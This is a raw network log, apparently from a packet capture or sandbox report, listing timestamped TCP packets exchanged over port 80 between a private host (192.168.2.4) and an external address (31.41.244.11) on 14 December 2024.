Dec 14, 2024 23:58:12.324084997 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.324137926 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.325036049 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.325150967 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.325166941 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.325217009 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.326093912 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.326143980 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.326210976 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.326261997 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.327188969 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.327282906 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.327336073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.328212976 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.328289986 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.328336000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.328387976 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.329251051 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.329303980 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.329418898 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.329555988 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.330318928 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.330419064 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.330471992 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.331361055 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.331439018 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.331501961 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.331553936 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.332432985 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.332556963 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.332612038 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.333468914 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.333614111 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.333669901 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.334527016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.334598064 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.334644079 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.334697008 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.335578918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.335732937 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.335788965 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.336638927 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.336688995 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.336750984 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.336801052 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.337708950 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.337836027 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.337891102 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.338751078 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.338809013 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.338874102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.338928938 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.339826107 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.339883089 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.339936018 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.339987993 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.340859890 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.340910912 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.340986013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.341037035 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.341922045 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.342030048 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.342087030 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.342967033 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.343020916 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.343086958 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.343141079 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.344019890 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.344072104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.344144106 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.344192982 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.345079899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.345134020 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.345196009 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.345243931 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.346235037 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.346311092 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.346371889 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.347178936 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.347225904 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.347306013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.347381115 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.348248005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.348297119 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.348366022 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.348418951 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.349365950 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.349478006 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.349534988 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.350358963 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.350404978 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.350481033 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.350548983 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.351412058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.351459980 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.351532936 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.351583958 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.352524042 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.352574110 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.352591038 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.352638960 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.353514910 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.353569031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.353648901 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.353701115 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.354563951 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.354626894 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.354671955 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.354721069 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.355614901 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.355667114 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.355742931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.355811119 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.356705904 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.356756926 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.356842041 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.356892109 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.357737064 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.357784986 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.357860088 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.357908964 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.358788013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.358838081 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.358908892 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.358951092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.359844923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.359894037 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.359975100 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.360021114 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.360884905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.360954046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.361033916 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.361080885 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.361941099 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.361996889 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.362055063 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.362107038 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.363004923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.363050938 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.363116026 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.363161087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.364229918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.364283085 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.364382982 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.364442110 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.365098000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.365151882 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.365238905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.365287066 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.366254091 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.366326094 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.366411924 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.366468906 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.367235899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.367284060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.367342949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.367399931 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.368293047 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.368371964 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.368385077 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.368438005 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.369360924 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.369412899 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.369460106 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.369507074 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.370392084 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.370441914 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.370538950 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.370585918 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.371465921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.371516943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.371555090 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.371602058 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.509536982 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.509558916 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.509627104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.509833097 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.509882927 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.509974003 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.510020018 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.510924101 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.510968924 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.511054993 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.511101007 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.512003899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.512115002 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.512183905 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.513029099 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.513137102 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.513155937 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.513206959 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.514106035 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.514184952 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.514214039 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.514303923 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.515119076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.515352964 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.515414953 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.516180038 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.516310930 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.516371965 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.517241001 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.517298937 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.517362118 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.517433882 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.518305063 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.518368959 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.518826008 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.518882990 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.519364119 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.519443989 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.519455910 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.519500971 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.520410061 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.520464897 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.520510912 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.520545959 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.521452904 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.521501064 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.521588087 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.521672010 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.522532940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.522588968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.522633076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.522677898 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.523601055 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.523658991 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.523705959 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.523798943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.524632931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.524689913 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.524746895 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.524797916 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.525703907 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.525757074 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.525790930 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.526205063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.526753902 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.526808023 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.526886940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.527229071 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.527826071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.527930021 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.527981043 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.528898954 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.529006004 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.529006004 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.529051065 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.529921055 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.529972076 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.530018091 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.530069113 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.530957937 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.531068087 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.531126976 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.532054901 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.532118082 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.532155991 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.532200098 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.533061981 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.533111095 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.533173084 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.533217907 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.534132957 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.534233093 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.534248114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.534288883 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.535167933 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.535227060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.535301924 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.535352945 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.536216974 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.536263943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.536334991 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.536390066 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.537300110 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.537347078 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.537399054 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.537659883 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.538353920 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.538474083 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.538522005 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.539511919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.539557934 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.539675951 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.539767027 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.540468931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.540538073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.540600061 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.540656090 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.541542053 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.541662931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.541724920 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.542589903 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.542654991 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.542671919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.542715073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.543591022 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.543639898 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.543706894 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.543752909 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.544641018 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.544702053 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.544780970 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.544826031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.545723915 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.545774937 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.545819998 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.545864105 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.546771049 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.546828032 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.546901941 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.546948910 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.547830105 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.547933102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.547962904 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.547981024 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.548871040 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.548942089 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.548988104 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.549038887 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.549941063 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.549993992 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.550041914 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.550086975 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.551002026 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.551065922 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.551120043 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.552047014 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.552057028 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.552104950 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.552154064 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.552195072 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.553097010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.553165913 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.553200006 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.553359985 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.554189920 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.554249048 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.555541992 CET	80	49770	31.41.244.11	192.168.2.4
